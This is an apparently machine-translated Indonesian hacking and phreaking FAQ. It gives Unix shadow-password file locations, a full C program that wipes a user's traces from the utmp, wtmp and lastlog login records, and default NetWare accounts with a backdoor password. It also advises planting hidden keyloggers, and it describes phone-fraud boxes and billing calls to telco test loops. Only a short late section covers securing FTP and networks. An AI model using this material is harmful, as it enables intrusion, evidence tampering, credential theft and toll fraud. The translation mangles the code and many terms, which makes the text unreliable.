FAQ(Frequently Asked Question) tentang Hacking

FAQ(Frequently Asked Question) tentang Hacking


I. HACKING
* Apa itu hacking?
* Bagaimana cara crack password gelap?
* Bagaimana cara mengetahui perbedaan antara password terenkripsi dan password gelap?
* Dimana saya bisa mendapatkan file password jika itu dibayangi?
* Dimana file password berada?
* Apakah eksploitasi?
* Apa beberapa perintah telnet dasar?
* Bagaimana cara keluar dari file log?
* Apakah DNIC sebuah?
* Apakah Nua sebuah?
* Apa yang dimaksud dengan VAX / VMS?
* Apa itu telnet?
* Apakah yang dimaksud dengan remailer anonim?
* Apa itu PGP?
* Apa yang dimaksud dengan tcp / ip?
* Apa itu virus?
* Apa itu trojan?
* Apa itu cacing?
* Apa yang saya perlukan untuk menjadi hacker?
* Apakah beberapa account umum untuk Novell Netware?
* Bagaimana saya bisa mendapatkan akses pengawas untuk Novell Netware?

* Bagaimana cara mengakses password untuk Novell?
* Bagaimana cara crack password Novell Netware?
* Apa kode domain?
II. Phreaking
* Apa yang phreaking?
* Bagaimana cara memulai phreaking?
* Apa kotak?
* Apa jenis kotak yang ada?
* Bagaimana cara membuat kotak?
* Apakah lingkaran?
III. Keamanan
* Bagaimana cara membuat server FTP anonim?
* Apa adalah beberapa cara yang saya dapat mengamankan jaringan?
* Apa yang dimaksud dengan "buku pelangi?"
* Apakah sebuah sniffer?
* Apa itu firewall?
* Bagaimana cara menggunakan PGP untuk menguntungkan saya?
IV. Kelompok Pertanyaan
* Apakah psikotik?
* Apakah psikotik mencari anggota baru?
* Apakah Psikosis?
* Apa itu "Gateway Setan?" Yang
* Dimana saya dapat menemukan beberapa sumber yang baik pada hacking dan phreaking?
* Siapa semua anggota di psikotik?
* Apa layanan psikotik yang ditawarkan?


T. Apa itu hacking?


A. Hacking adalah seni membobol komputer untuk mendapatkan pengetahuan bahwa masyarakat kita telah tersembunyi dari kami. Hacking adalah ilegal dan pemerintah menghabiskan banyak uang setiap tahun untuk memiliki hacker ditangkap ..... ketika mereka harus menghabiskan uang pada isu-isu yang lebih penting.


T. Apakah sebuah password yang gelap?


A. Sebuah password gelap adalah penutup untuk file password yang sebenarnya. Hal ini menunjukkan bahwa password yang sebenarnya tersembunyi di tempat lain.


T. Bagaimana cara crack password gelap?


A. Cracking password file gelap tidak mungkin. Dengan asumsi bahwa Anda punya password file melalui ftp anonim. Anda harus mencoba menghubungkan ke port 25 dan melakukan bug sendmail.


T. Apa perbedaan antara password terenkripsi dan password gelap?


A. password terenkripsi hanya password yang sebenarnya acak dan berubah. Hal ini dapat retak dengan password retak dan file word. Sandi yang gelap menyembunyikan password terenkripsi di tempat lain selain dir dll.


Q. Dimana saya bisa mendapatkan file password jika itu dibayangi?


A. Unix Path Token
-------------------------------------------------- ---------------
AIX 3 / etc / security / passwd!
          atau / TcB / auth / files / /
A / UX 3.0s / TcB / files / auth /? / *
BSD4.3-Reno / etc / master.passwd *
ConvexOS 10 / etc / shadpw *
ConvexOS 11 / etc / shadow *
DG / UX / etc / TcB / aa / user / *
EP / IX / etc / shadow x
HP-UX / .secure / etc / passwd *
IRIX 5 / etc / shadow x
Linux 1.1 / etc / shadow *
OSF / 1 / etc / passwd [dir |.. Pag] *
SCO Unix # .2 x / TcB / auth / file. / /
SunOS4.1 + c2 / etc / security / passwd.adjunct # # username
SunOS 5.0 / etc / shadow
                                  
System V Release 4.0 / etc / shadow x
System V Release 4.2 / etc / security / database *
ULTRIX 4 / etc / auth [dir |.. Pag] *
UNICOS / etc / UDB *


Q. Dimana file password berada?


A. password file terletak di dir etc / passwd. Anda dapat masuk ke dir dll dengan masuk ke domain melalui ftp anonim.


T. Apakah eksploitasi?


Mengeksploitasi A. adalah sesuatu yang mengeksploitasi unix atau jenis lain dari OS. Anda biasanya menggunakan eksploit untuk mendapatkan root atau akses yang tinggi ke sistem. Mereka dapat terbukti sangat berguna.


T. Apa beberapa perintah telnet dasar?


A. Di bawah ini adalah daftar perintah telnet umum.


Command Fungsi


mengakses account Telnet
c Hubungkan ke sebuah host
cont Lanjutkan
d Putus
Jaringan penuh gema
setengah gema Terminal
hangup Hang up
surat Surat
Pilih mengatur parameter PAD
Stat Tampilkan port jaringan.
Telemail Mail


T. Bagaimana cara keluar dari file log?


A. Edit / etc / utmp, / usr / adm / wtmp dan / usr / adm / lastlog. Ini bukan file teks yang dapat diedit dengan tangan dengan vi, Anda harus menggunakan program khusus ditulis untuk tujuan ini.
Contoh:


# Include
# Include
# Include
# Include
# Include
# Include
# Include
# Include
# Define WTMP_NAME "/ usr / adm / wtmp"
# Define UTMP_NAME "/ etc / utmp"
# Define LASTLOG_NAME "/ usr / adm / lastlog"

int f;

kekosongan kill_utmp (yang)
char * yang;
{
    struct utmp_ent utmp;

  if ((f = open (UTMP_NAME, O_RDWR))> = 0) {
        sementara (baca (f, & utmp_ent, sizeof (utmp_ent))> 0)
          if (strncmp (utmp_ent.ut_name, yang, strlen (yang))) {
                          bzero ((char *) & utmp_ent, sizeof (utmp_ent));
                          lseek (f, - (sizeof (utmp_ent)), SEEK_CUR);
                          menulis (f, & utmp_ent, sizeof (utmp_ent));
                  }
        menutup (f);
  }
}

kekosongan kill_wtmp (yang)
char * yang;
{
    struct utmp_ent utmp;
    panjang pos;

    pos = 1L;
    if ((f = open (WTMP_NAME, O_RDWR))> = 0) {

        sementara (pos =-1L!) {
           lseek (f, - (lama) ((sizeof (struct utmp)) * pos), L_XTND);
           if (read (f, & utmp_ent, sizeof (struct utmp)) <0) {
                pos =-1L;
           } Else {
                if (strncmp (utmp_ent.ut_name, yang, strlen (yang))) {
                        bzero ((char *) & utmp_ent, sizeof (struct utmp));
                        lseek (f, - ((sizeof (struct utmp)) * pos), L_XTND);
                        menulis (f, & utmp_ent, sizeof (utmp_ent));
                        pos =-1L;
                } Else pos + = 1L;
           }
        }
        menutup (f);
  }
}

kekosongan kill_lastlog (yang)
char * yang;
{
    struct * passwd pwd;
    struct lastlog newll;

        if ((pwd = getpwnam (yang)) = NULL) {

           if ((f = open (LASTLOG_NAME, O_RDWR))> = 0) {
                  lseek (f, (panjang) pwd-> pw_uid * sizeof (struct lastlog), 0);
                  bzero ((char *) & newll, sizeof (newll));
                  menulis (f, (char *) & newll, sizeof (newll));
                  menutup (f);
           }

    } Else printf ("% s: \ n?", Yang);
}

main (argc, argv)
int argc;
char * argv [];
{
    if (argc == 2) {
           kill_lastlog (argv [1]);
           kill_wtmp (argv [1]);
           kill_utmp (argv [1]);
           printf ("Zap2 \ n");
    } Else
    printf ("Kesalahan \ n.");
}


T. Apakah DNIC?


A. DNIS mengatakan jaringan yang terhubung ke telnet Anda gunakan.


T. Apakah Nua?


A. Nua adalah alamat dari komputer di telnet.


T. Apa yang dimaksud dengan VAX / VMS?


A. vax / vms adalah garis besar komputer Digital Equipment. Sistem operasi proprietary itu dikenal sebagai vms.


T. Apakah telnet?


A. Telnet adalah program yang memungkinkan Anda login ke komputer lain di internet.


T. Apakah yang dimaksud dengan remailer anonim?


A. remailer anonim adalah sistem di Internet yang memungkinkan Anda untuk mengirim e-mail secara anonim atau posting pesan ke Usenet anonim. Anda mengajukan permohonan nomor anonim di situs remailer. Kemudian, ketika Anda mengirim pesan ke remailer, ia mengirimkannya keluar dari ID anonim Anda di remailer. Tidak ada yang membaca posting akan tahu real account nama Anda atau nama host. Jika seseorang mengirim pesan ke nomor anonim Anda, itu akan diteruskan ke real account Anda oleh remailer.


T. Apakah PGP?


A. Jawaban FAQ ini disadur dari:
PGP (tm) Panduan Pengguna Volume I: Topik oleh Philip Zimmermann Esensial
PGP (tm) menggunakan public-key enkripsi untuk melindungi file E-mail dan data. Berkomunikasi secara aman dengan
orang belum pernah Anda temui, tanpa saluran aman yang dibutuhkan untuk pertukaran sebelum kunci. PGP adalah baik
fitur dan cepat, dengan manajemen kunci canggih, tanda tangan digital, kompresi data, dan
baik ergonomis desain.
Pretty Good (tm) Privacy (PGP), dari Software Phil Pretty Good, adalah kriptografi keamanan yang tinggi perangkat lunak aplikasi untuk MS-DOS, Unix, VAX / VMS, dan komputer lainnya. PGP memungkinkan file orang toexchange atau pesan dengan privasi, otentikasi, dan kenyamanan. Privasi berarti bahwa hanya mereka dimaksudkan untuk menerima pesan dapat membacanya. Otentikasi berarti bahwa pesan yang tampaknya dari orang tertentu hanya dapat berasal dari orang tersebut. Convenience berarti bahwa privasi dan otentikasi disediakan tanpa kerepotan mengelola kunci yang terkait dengan perangkat lunak kriptografi konvensional. Tidak ada saluran aman yang diperlukan untuk pertukaran kunci antara pengguna, yang membuat PGP jauh lebih mudah digunakan. Hal ini karena PGP didasarkan pada teknologi baru yang kuat yang disebut "public key" kriptografi. PGP menggabungkan kenyamanan cryptosystem Rivest Shamir-Adleman-(RSA) kunci publik dengan kecepatan kriptografi konvensional, mencerna pesan untuk tanda tangan digital, kompresi data sebelum enkripsi, desain ergonomis yang baik, dan manajemen kunci yang canggih. Dan PGP melakukan fungsi kunci publik lebih cepat daripada kebanyakan implementasi perangkat lunak lain. PGP adalah kriptografi kunci publik untuk massa.


T. Apakah tcp / ip?


A. tcp / ip adalah sistem jaringan digunakan untuk berkomunikasi satu sama lain. Itu singkatan Transmisi Protokol / Internet Protokol Kontrol.


T. Apakah virus?


A. Virus adalah program yang mereproduksi dirinya sendiri. Ini mungkin menempelkan dirinya ke program lain, mungkin membuat salinan dirinya. Ini dapat merusak atau data data yang korup, mengubah, atau menurunkan kinerja sistem anda dengan memanfaatkan sumber daya seperti memori atau ruang disk. Beberapa scanner viruse mendeteksi beberapa virus. Tidak ada Virus scanner mendeteksi semua virus. Scanner virus akan bekerja untuk sementara waktu tetapi orang selalu menciptakan virii yang akan mengalahkan mereka.


T. Apakah trojan?


A. trojan adalah program yang melakukan fungsi yang tidak sah, tersembunyi di dalam program yang berwenang. Ia melakukan sesuatu yang lain dari yang harus dilakukan klaim, biasanya sesuatu yang jahat, dan hal itu dimaksudkan oleh penulis untuk melakukan apa yang dilakukannya. Jika tidak disengaja, hal itu disebut bug.


T. Apakah cacing?


Cacing A. yang programsthat menyalin sendiri berulang menggunakan ruang dan memperlambat sistem. Mereka mandiri dan menggunakan jaringan untuk menyebar, dalam banyak cara yang sama yang menggunakan file-file Virus menyebar. Beberapa orang mengatakan solusi untuk Virus dan worm adalah untuk tidak memiliki file atau jaringan.




T. Apa yang saya perlukan untuk menjadi seorang hacker?


J. Anda harus mulai dengan scanner yang baik, beberapa dialups, klien telnet, dan beberapa penyuluhan, hacking. Mereka adalah hal dasar yang Anda perlu. Jika anda serius tentang hacking maka Anda harus mendapatkan Unix, atau Linux (lebih kecil, versi gratis dari unix).


T. Apa adalah beberapa rekening umum untuk Novell Netware?


A. Di bawah ini adalah daftar account umum digunakan untuk Novell Netware.
       Rekening Tujuan
        -------------------------------------------------- --------------
        PRINT Melampirkan ke server kedua untuk pencetakan
        LASER Melampirkan ke server kedua untuk pencetakan
        HPLASER Melampirkan ke server kedua untuk pencetakan
        PRINTER Melampirkan ke server kedua untuk pencetakan
        LaserWriter Melampirkan ke server kedua untuk pencetakan
        Melampirkan POST ke server kedua untuk email
        MAIL Melampirkan ke server kedua untuk email
        GATEWAY Melampirkan sebuah mesin gateway ke server
        GATE Melampirkan sebuah mesin gateway ke server
        ROUTER Melampirkan router email ke server
        CADANGAN Mungkin memiliki password / stasiun pembatasan (lihat di bawah), digunakan
                        untuk membuat cadangan server ke unit pita melekat pada
                        workstation. Untuk backup lengkap, Supervisor kesetaraan
                        diperlukan.
        WANGTEK Lihat CADANGAN
        FAX Melampirkan unit modem faks yang didedikasikan untuk jaringan
        FAXUSER Melampirkan unit modem faks yang didedikasikan untuk jaringan
        FAXWORKS Melampirkan unit modem faks yang didedikasikan untuk jaringan
        UJI Sebuah account pengguna tes untuk digunakan suhu
        Pengarsip Palidrome default account untuk cadangan
        CHEY_ARCHSVR Account untuk Arcserve untuk login ke server dari
                        dari konsol untuk backup tape. Versi 5.01g 's
                        sandi adalah WONDERLAND. Hapus Station
                        Pembatasan dan menggunakan SUPER.EXE untuk beralih ini
                        rekening dan Anda memiliki backdoor yang sangat baik.
        WINDOWS_PASSTHRU Meskipun tidak diperlukan, sesuai dengan Win95 Microsoft
                        Resource Kit, Ch. 9 pg. 292 dan Ch. 11 hal. 401 Anda
                        memerlukan ini untuk berbagi sumber daya tanpa password.


T. Bagaimana cara mendapatkan akses pengawas untuk Novell Netware?


A. Diambil dari Novell Netware FAQ.
Metode rahasia adalah metode menggunakan editor sektor berbasis DOS untuk mengedit
entri dalam FAT, dan reset ke default penjilidan pada saat reboot server. Hal ini memberikan
Anda Pengunjung Supervisor dan tanpa password. Metode ini diajarkan dalam kasus Anda
hilang Pengawas pada server Netware 2.15 dan Anda tidak memiliki rekening setara supe
dibuat. Hal ini juga menghemat server dari menghapus dan reboot dalam kasus rekening Supervisor adalah korup, dihapus, atau dibuang.




T. Bagaimana cara mengakses file password untuk Novell?


A. akses ke file password di Netware tidak seperti Unix - password file tidak di tempat terbuka. Semua benda dan sifat mereka disimpan dalam file penjilidan pada 2.x dan 3.x, dan disimpan di NDS
database di 4.x. Contoh dari sebuah objek mungkin printer, kelompok, rekening individu dll Contoh sifat obyek mungkin termasuk kata sandi akun atau nama pengguna penuh, atau daftar anggota grup atau nama lengkap. File-file penjilidan atribut (atau bendera) dalam 2.x dan 3.x yang Tersembunyi
dan Sistem, dan file-file ini terletak di SYS: SYSTEM volume di subdirektori. Nama mereka adalah sebagai berikut:


        Berkas versi Netware Nama
        -------------------------
        NET 2.x $ BIND.SYS, $ BERSIH BVAL.SYS
        NET 3.x $ OBJ.SYS, $ NET PROP.SYS, $ BERSIH VAL.SYS


The $ NET BVAL.SYS dan $ NET VAL.SYS adalah dimana password sebenarnya terletak
di 2.x dan 3.x masing-masing.




T. Bagaimana cara crack password Novell?


A. Diambil dari Novell Netware Hack FAQ.


Jika Deteksi Penyusup tidak aktif, Anda dapat menggunakan "kekerasan" password cracker.


Password terenkripsi adalah cara Novell untuk melindungi password dari sniffers.
Sejak versi Netware (2.15c) dikirim password sebagai teks biasa selama
kawat, sniffer bisa melihat password karena lewat. Untuk mengamankan hal,
Novell memberikan administrator cara untuk mengontrol ini. Kemudian versi dari
Program LOGIN.EXE akan mengenkripsi password sebelum mengirimkan ke seberang
kabel ke server. Tapi sebelum ini bisa terjadi, shell (NETX) memiliki
diperbarui. Sejak beberapa lokasi harus memiliki cangkang yang lebih tua dan lebih tua
versi LOGIN.EXE untuk mendukung peralatan yang lebih tua, administrator memiliki
pilihan untuk membiarkan password terenkripsi untuk mengakses server. Hal ini dilakukan
dengan mengetik SET MENGIZINKAN password tidak terenkripsi = ON di konsol atau dengan menambahkannya
untuk AUTOEXEC.ncf tersebut. Standarnya adalah OFF, yang berarti NOVELBFH dapat berbunyi
server menghibur setiap usaha! Untungnya sebagian besar situs menghidupkan saklar ini ke
mendukung beberapa perangkat lama.


Jika Anda memiliki akses ke konsol, baik dengan berdiri di depannya atau dengan
RCONSOLE, Anda dapat menggunakan SETSPASS.NLM, SETSPWD.NLM atau SETPWD.NLM untuk mereset password.
Hanya memuat NLM dan menyebarkannya parameter baris perintah:


        NLM Account (s) ulang Netware versi (s) didukung
        -------------------------------------------------- -------
        SETSPASS.NLM SUPERVISOR 3.x
        SETSPWD.NLM SUPERVISOR 3.x, 4.x
        SETPWD.NLM setiap account yang valid 3.x, 4.x


Jika Anda dapat menanam penangkap password atau pembaca keystroke, Anda bisa mendapatkan mereka
cara ini. File LOGIN.EXE terletak di SYS: LOGIN direktori, dan
biasanya Anda tidak akan memiliki akses untuk menempatkan file dalam direktori tersebut. Yang terbaik
tempat untuk meletakkan sebuah program capture keystroke adalah di jalan workstation, dengan
ATTRIB yang ditetapkan sebagai tersembunyi. Keuntungannya adalah bahwa Anda akan mendapatkan password dan
Netware tidak akan tahu Anda digesek itu. Kerugiannya adalah mendapatkan akses ke
mesin untuk melakukan ini. Tempat terbaik untuk menempatkan salah satu program capture
adalah pada mesin yang umum, seperti kotak pcAnywhere, yang digunakan untuk akses jarak jauh.
Banyak lokasi akan memungkinkan akses pcAnywhere untuk mesin dengan hampir tidak ada
perangkat lunak di atasnya, dan kontrol keamanan akses ke LAN dengan menggunakan Netware yang
fitur keamanan. Meng-upload program capture keystroke untuk mesin seperti
ini kekalahan ini.


T. Apa kode domain?


A. Di bawah ini adalah daftar saat ini kode domain.
AD Andorra
AE Uni Emirat Arab
AF Afghanistan
AG Antigua dan Barbuda
AI Anguilla
AL Albania
AM Armenia
AN Antillen Belanda
AO Angola
AQ Antartika
AR Argentina
SEBAGAI Samoa Amerika
AT Austria
AU Australia
AW Aruba
AZ Azerbaidjan
BA Bosnia-Herzegovina
BB Barbados
BD Banglades
BE Belgium
BF Burkina Faso
BG Bulgaria
BH Bahrain
BI Burundi
BJ Benin
BM Bermuda
BN Brunei Darussalam
BO Bolivia
BR Brasil
BS Bahama
BT Buthan
BV Bouvet Island
BW Botswana
OLEH Belarus
BZ Belize
CA Kanada
CC Kepulauan Cocos (Keeling)
CF Republik Afrika Tengah
CG Kongo
CH Swiss
CI Pantai Gading
CK Kepulauan Cook
CL Chili
CM Kamerun
CN China
CO Kolombia
CR Kosta Rika
CS Cekoslowakia
CU Kuba
CV Tanjung Verde
CX Pulau Christmas
CY Siprus
CZ Republik Ceko
DE Jerman
DJ Djibouti
DK Denmark
DM Dominika
DO Republik Dominika
DZ Aljazair
EC Ekuador
EE Estonia
EG Mesir
EH Sahara Barat
ES Spanyol
ET Ethiopia
FI Finlandia
FJ Fiji
FK Kepulauan Falkland (Malvinas)
FM Mikronesia
FO Kepulauan Faroe
FR Prancis
FX Perancis (Wilayah Eropa)
GA Gabon
GB Britania Raya (Inggris)
GD Grenada
GE Georgia
GH Ghana
GI Gibraltar
GL Greenland
GP Guadeloupe (Prancis)
GQ Guinea Ekuatorial
GF Guyana (Prancis)
GM Gambia
GN Guinea
GR Yunani
GT Guatemala
GU Guam (AS)
GW Guinea Bissau
GY Guyana
HK Hong Kong
HM Heard dan Kepulauan McDonald
HN Honduras
HR Kroasia
HT Haiti
HU Hungaria
ID Indonesia
IE Irlandia
IL Israel
IN India
IO British Indian Ocean Territory
IQ Irak
IR Iran
IS Islandia
IT Italy
JM Jamaika
JO Yordania
JP Jepang
KE Kenya
KG Kirgistan
KH Kamboja
KI Kiribati
KM Comoros
KN Saint Kitts Nevis Anguilla
KP Korea Utara
KR Korea Selatan
KW Kuwait
KY Kepulauan Cayman
KZ Kazachstan
LA Laos
LB Libanon
LC Saint Lucia
LI Liechtenstein
LK Sri Lanka
LR Liberia
LS Lesotho
LT Lithuania
LU Luksemburg
LV Latvia
LY Libya
MA Maroko
MC Monako
MD Moldavia
MG Madagaskar
MH Kepulauan Marshall
ML Mali
MM Myanmar
MN Mongolia
MO Makau
MP Kepulauan Mariana Utara
MQ Martinique (Perancis)
MR Mauritania
MS Montserrat
MT Malta
MU Mauritius
MV Maladewa
MW Malawi
MX Meksiko
SAYA Malaysia
MZ Mozambik
NA Namibia
NC Kaledonia Baru (Perancis)
TL Niger
NF Pulau Norfolk
NG Nigeria
NI Nikaragua
NL Belanda
NO Norwegia
NP Nepal
NR Nauru
NT Zona Netral
NU Niue
NZ Selandia Baru
OM Oman
PA Panama
PE Peru
PF Polinesia (Perancis)
PG Papua
PH Filipina
PK Pakistan
PL Polandia
PM Saint Pierre dan Miquelon
PN Pitcairn
PT Portugal
PR Puerto Rico (AS)
PW Palau
PY Paraguay
QA Qatar
RE Reunion (Prancis)
RO Rumania
RU Federasi Rusia
RW Rwanda
SA Arab Saudi
SB Kepulauan Solomon
SC Seychelles
SD Sudan
SE Swedia
SG Singapura
SH Saint Helena
SI Slovenia
SJ Svalbard dan Jan Mayen Kepulauan
SK Republik Slovakia
SL Sierra Leone
SM San Marino
Senegal SN
SO Somalia
SR Suriname
ST Saint Tome dan Principe
SU Uni Soviet
SV El Salvador
SY Suriah
SZ Swaziland
TC Kepulauan Turks dan Caicos
TD Chad
TF Perancis Selatan Wilayah
TG Togo
TH Thailand
TJ Tadjikistan
TK Tokelau
TM Turkmenistan
TN Tunisia
UNTUK Tonga
TP Timor Timur
TR Turki
TT Trinidad dan Tobago
TV Tuvalu
TW Taiwan
TZ Tanzania
UA Ukraina
UG Uganda
Inggris Inggris
UM US Minor Outlying Islands
US Amerika Serikat
UY Uruguay
UZ Uzbekistan
VA Vatikan City State
VC Saint Vincent dan Grenadines
VE Venezuela
VG Kepulauan Virgin (Inggris)
VI Kepulauan Virgin (AS)
VN Vietnam
VU Vanuatu
WF Wallis dan Futuna Islands
WS Samoa
YE Yaman
YU Yugoslavia
ZA Afrika Selatan
ZM Zambia
ZR Zaire
ZW Zimbabwe
ARPA Old gaya Arpanet
COM US Commercial
EDU AS Pendidikan
GOV Pemerintah AS
INT Internasional
MIL Militer AS
NATO NATO bidang
NET Jaringan
ORG Nirlaba






T. Apa yang phreaking?


A. Phreaking adalah sesuatu yang ilegal yang ada hubungannya dengan telepon dan saluran telepon.


T. Bagaimana cara memulai phreaking?


J. Anda harus mulai dengan belajar tentang kotak dan membaca di berbagai jenis phreaking.


T. Apa jenis kotak yang ada?


A.Below adalah daftar kotak yang paling umum dan apa yang mereka lakukan.


Kotak Acrylic - Mencuri Tiga-Way-Memanggil dan Call Waiting.
Aero Kotak - Membuat panggilan fone bebas dari Payfones.
Aqua Kotak - Tiriskan tegangan dari Kunci FBI Dalam panggilan Trace.
Kotak Beige - ulangan sebuah mens garis tangan-set.
Black Box - Memungkinkan pihak pemanggil tidak bisa dikenakan biaya untuk panggilan mereka menempatkan.
Ledakan Kotak - Fone Amplifier Mikrofon.
Mabuk Kotak - Shorts fone setiap keluar di daerah tersebut.
Biru Kotak - Memanfaatkan nada 2600Hz untuk panggilan fone gratis.
Kotak Band - Membuat garis partai dari 2 baris fone yang ada.
Bud Kotak - Digunakan untuk memasuki garis fone Anda tetangga.
Sibuk Box - Digunakan untuk membunuh nada panggil pada fone seseorang.
Chartreuse Kotak - Gunakan Listrik dari telepon Anda untuk hal lain.
Keju Kotak - Menyala fone Anda ke dalam sebuah Payfone.
Kotak Chrome - Memungkinkan anda memanipulasi sinyal lalu lintas melalui remote control.
Batal Kotak - Digunakan untuk membuat panggilan gratis di Fones Benteng.
Tembaga Kotak - Penyebab cross-talk gangguan pada extender.
Crimson Kotak - Kisah Para Rasul sebagai tombol 'Tahan' untuk fone Anda.
Kotak Hitam - reroutes panggilan keluar atau incomming untuk fone lain.
Kotak Dayglo - Memungkinkan Anda untuk terhubung ke jalur fone Anda tetangga.
Kotak Ditto - Memungkinkan Anda untuk evesdrop di baris lain fone.
Divertor Kotak - reroutes panggilan keluar atau incomming untuk fone lain.
Kotak DLOC - Memungkinkan anda confrence 2 baris fone (selain Anda sendiri).
Emas Kotak - Memungkinkan Anda untuk melacak panggilan atau mengetahui apakah yang sedang dilacak.
Green Box - Memungkinkan Anda membuat Coin Mengumpulkan, Kembali koin, dan nada ringback.
Jack Kotak - Sebuah tombol nada sentuh.
Cahaya Kotak - Sebuah Transmitter AM.
Lunch Box - Digunakan untuk memasuki garis fone Anda tetangga.
Magenta Kotak - Menyambungkan satu baris fone remote ke baris lain fone terpencil.
Kotak Mauve - Memungkinkan anda keran fone tanpa memotong ke garis fone.
Neon Box - Sebuah mikrofon eksternal.
Emas Baru Kotak - Sebuah versi update baru dari Kotak Emas.
Kotak Kebisingan - Membuat garis kebisingan.
Olive Kotak - Digunakan sebagai dering eksternal.
Paisley Kotak - Sebuah kombinasi dari hampir semua kotak yang ada.
Kotak Pandora - Membuat nada intensitas tinggi yang dapat menyebabkan rasa sakit. Baik untuk mengerjaiku.
Partai Kotak - Memungkinkan anda membuat garis partai dari 2 baris fone.
Pearl Kotak - Sebuah generator nada.
Kotak Pink - Memungkinkan Anda menghubungkan 2 baris fone seprate bersama dan memiliki 3 cara memanggil.
Purple Box - Sebuah tombol hold fone.
Kotak Rainbow - Tewaskan jejak dengan menempatkan 120V ke garis fone.
X Bosan - Memungkinkan Anda membuat panggilan gratis dari payfone dengan memproduksi nada koin.
Batu Kotak - Menambahkan musik ke garis fone Anda.
Kotak Scarlet - Kotak Silver - Menambahkan DTMF A, B, C, & D untuk nada prioritas baris Anda.
Kotak lumpur salju - Dapat dipasang di tempat usaha yang memiliki standar multi-line fones.
Statis Kotak - Jaga tegangan pada garis fone tinggi.
Beralih Kotak - Menambahkan ditahan, lampu indikator, confrence, dll
Tan Kotak - Line diaktifkan telefone perekam.
Tron Kotak - Reverse fase kekuatan untuk rumah Anda, dan membuat meter Anda berjalan lebih lambat.
Urine Kotak - Membuat gangguan antara cincin dan kabel ujung di someones fone.
Violet Box - Menyimpan payfone dari menutup telepon.
Putih Kotak - Sebuah tombol DTMF portabel.
Kotak Kuning - Tambahkan fone perpanjangan.


T. Bagaimana cara membuat kotak?


A. Setiap kotak memiliki rencana sepperate untuk memasangnya. Hanya melakukan netsearch untuk phreaking atau kotak dan Anda dapat menemukan semua rencana yang Anda butuhkan.


T. Apakah lingkaran?


A. Jawaban FAQ ini disadur dari:
ToneLoc v0.99 User Manual oleh Minor Threat & Maas Mucho
Loops adalah sepasang nomor telepon, biasanya berturut-turut, seperti 836-9998 dan 836-9999. Mereka adalah
digunakan oleh perusahaan telepon untuk pengujian. Loop do Apa gunanya memisahkan kita? Nah, mereka dingin dalam beberapa
cara. Berikut ini adalah penggunaan sederhana dari loop. Setiap loop memiliki dua ujung, sebuah 'tinggi' akhir, dan 'rendah' ​​akhir. Salah satu ujung
memberikan (biasanya) konstan, nada keras ketika dipanggil. Ujung yang lain adalah diam. Loops biasanya tidak
berdering baik. Ketika KEDUA berakhir disebut, orang-orang yang disebut setiap ujungnya dapat berbicara melalui loop.
Beberapa loop suara disaring dan tidak akan melewati apa pun kecuali nada konstan, ini tidak banyak digunakan untuk
Anda. Inilah yang dapat Anda gunakan loop bekerja untuk: panggilan telepon penagihan! Pertama, panggilan akhir yang memberikan nada keras. Kemudian jika operator atau seseorang memanggil ujung yang lain, nada akan tenang. Bertindak seperti telepon hanya berdering dan Anda menjawabnya ... mengatakan "Halo", "Allo", "Chow", "Yo", atau apa fuck pernah. Operator berpikir bahwa ia hanya menelepon Anda, dan hanya itu! Sekarang tagihan telepon akan masuk ke loop, dan RBOC lokal Anda akan mendapatkan tagihan! Gunakan teknik ini di moderasi, atau loop mungkin turun. Loop mungkin paling berguna ketika Anda ingin berbicara dengan seseorang yang Anda tidak ingin memberikan nomor telepon Anda.


T. Bagaimana cara mendirikan sebuah anonymous FTP?


A. Diambil dari Sistem Internet Security, Inc teks tentang pengaturan ftp anonim.
- 1.Build versi statis terkait dari ftpd dan meletakkannya di ~ ftp / bin. Pastikan itu dimiliki oleh root.
     - 2.Build versi terhubung statis dari / bin / ls jika Anda akan membutuhkannya. Masukkan ke dalam ~ ftp / bin. Jika Anda berada di Sun, dan perlu membangun satu, ada versi porting dari perintah ls BSD NET2 untuk SunOs
     pada ftp.tis.com: pub / firewall / toolkit / patches / ls.tar.Z Pastikan itu dimiliki oleh root.
     - 3.Chown ~ ftp ke root dan membuatnya modus 755 INI SANGAT PENTING
    - 4.Set salinan cadangan ~ ftp / etc / passwd dan ~ ftp / etc / group hanya seperti biasa, KECUALI
     membuat direktori home ftp di '/' - pastikan mereka dimiliki oleh root.
    - 5.Write bungkus untuk menendang ftpd off dan menginstalnya di / etc / inetd.conf wrapper akan terlihat
     sesuatu seperti: (dengan asumsi ~ ftp = / var / ftp)
     main ()


     {


     if (chdir ("/ var / ftp")) {


             perror ("chdir / var / ftp");


             exit (1);


     }


     if (chroot ("/ var / ftp")) {


             perror ("chroot / var / ftp");


             exit (1);


     }


     / Opsional *: seteuid (FTPUID); * /


     execl ("/ bin / ftpd", "ftpd", "-l", (char *) 0);


     perror ("exec / bin / ftpd");


     exit (1);


     }
     Pilihan:
     Anda dapat menggunakan 'netacl' dari toolkit atau tcp_wrappers untuk mencapai efek yang sama.
     Kami menggunakan 'netacl' untuk beralih sehingga beberapa mesin yang terhubung ke layanan FTP * tidak * mendapatkan
     chroot pertama. Hal ini membuat mentransfer file sedikit kurang menyakitkan.
     Anda juga mungkin ingin mengambil Anda sumber ftpd dan menemukan semua tempat-tempat itu panggilan seteuid ()
     dan menghapus mereka, maka telah bungkusnya melakukan setuid (ftp) tepat sebelum exec. Ini berarti
     bahwa jika seseorang tahu lubang yang membuat mereka "root" mereka masih tidak akan. Santai dan bayangkan
     bagaimana mereka akan frustrasi.
     Jika Anda melakukan hacking sumber ftpd, saya sarankan Anda mematikan banyak pilihan dalam ftpcmd.y oleh
     unsetting yang "diimplementasikan" bendera di ftpcmd.y. Ini hanya praktis jika daerah FTP Anda
     read-only.
- 6.As biasa, membuat lulus melalui area FTP dan memastikan bahwa file-file tersebut dalam mode benar
     dan bahwa tidak ada yang lain di sana yang dapat dieksekusi.
- 7.Note, sekarang, bahwa daerah FTP Anda / etc / passwd benar-benar terpisah dari nyata / etc / passwd.
     Ini memiliki kelebihan dan kekurangan.
- Hal 8.Some bisa pecah, seperti syslog, karena tidak ada / dev / log. Entah membangun sebuah versi dari ftpd
     dengan syslog UDP berbasis () rutin atau menjalankan kedua syslogd berdasarkan kode Bersih2 BSD,
     yang mempertahankan soket unix-domain bernama ~ ftp / dev / log dengan-p bendera.


T. Apa adalah beberapa cara saya dapat mengamankan jaringan?


A. Diambil dari teks Internet Sistem Keamanan pada pengamanan jaringan.
1. Yah pertama-tama Anda harus tahu apa jenis sumber daya yang Anda mencoba untuk melindungi: CPU, file, penyimpanan perangkat saluran telepon, dll ..
 2. Tentukan langkah-langkah keamanan host khusus yang dibutuhkan. Proteksi password, file
enkripsi, firewall, dll ..
